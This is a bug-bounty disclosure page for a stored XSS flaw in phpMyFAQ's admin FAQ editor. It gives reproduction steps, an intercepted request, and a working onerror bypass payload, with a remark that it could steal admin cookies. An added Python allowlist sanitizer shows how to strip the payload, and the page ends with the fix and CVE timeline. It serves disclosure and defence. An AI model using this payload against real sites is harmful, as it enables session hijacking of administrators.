Stored XSS bypass in "FAQ" in thorsten/phpmyfaq


Reported on May 2nd 2023


Stored XSS in the "Add new FAQ" feature via an XSS payload injected into the answer, as follows:


1- Login as admin and go to the following URL to add a new FAQ
2- Enter the "Question" and "Answer" values and intercept the request

POST /admin/?action=insertentry HTTP/2
Cookie: PHPSESSID=0d93a6d553659b592de5960477f2dcf3; phpmyfaq-setup=db7f78de80ee8152a536f2e90b38c1ff; cookieconsent_status=dismiss; pmf_sid=53
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 535
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers


3- Delete the HTML code in the "answer" parameter and type a bypass payload such as <img only=1 src=x onerror=alert(1)>
4- Send the request and publish it to see the alert


So any co-admin or support user can inject the payload and steal admin cookies.
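An added example, not code from this report or from phpMyFAQ: an allowlist sanitizer of the kind a server should run over the "answer" field before storing it. The tag and attribute allowlists are assumed policy choices; the point is that tags and attributes are decided per parsed token, so an unknown attribute such as `only=1` and any event-handler attribute such as `onerror` are dropped regardless of their order or quoting, and the payload above reduces to a bare `<img>`.

```python
from html import escape
from html.parser import HTMLParser

# Assumed allowlist policy for FAQ answer HTML (not phpMyFAQ's own configuration).
ALLOWED_TAGS = {"p", "br", "b", "i", "strong", "em", "ul", "ol", "li", "a", "img", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "title"}}
SAFE_URL_PREFIXES = ("http://", "https://", "/")   # relative path or http(s) only
VOID_TAGS = {"br", "img"}


class AnswerSanitizer(HTMLParser):
    """Rebuilds the input from parsed tokens, keeping only allowlisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []   # (tag, attr) pairs that were rejected; useful for audit logging

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:           # e.g. <script>, <iframe>: tag is dropped, text kept escaped
            self.dropped.append((tag, None))
            return
        kept = []
        for name, value in attrs:             # HTMLParser lowercases names, so "onError" is caught too
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):   # rejects only=1, onerror=..., style=...
                self.dropped.append((tag, name))
                continue
            if name in ("href", "src") and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                self.dropped.append((tag, name))             # rejects javascript:, data:, bare "x"
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))  # text is never re-emitted raw


def sanitize_answer(html: str):
    """Returns (clean_html, dropped) for an untrusted FAQ answer."""
    parser = AnswerSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    # Constructed sample using the payload from the report above.
    print(sanitize_answer('<p>Hello <img only=1 src=x onerror=alert(1)></p>'))
```

The `dropped` list is what a defender would log: a stored answer that repeatedly sheds `on*` attributes from a support account is worth an alert.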

We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours. 7 months ago
thorsten/phpmyfaq maintainer has acknowledged this report 7 months ago
Thorsten Rinne validated this vulnerability 7 months ago
Mohamed Abdelhady has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Thorsten Rinne marked this as fixed in 3.1.14 with commit 937913 7 months ago
Thorsten Rinne has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on May 31st 2023
Thorsten Rinne published this vulnerability 6 months ago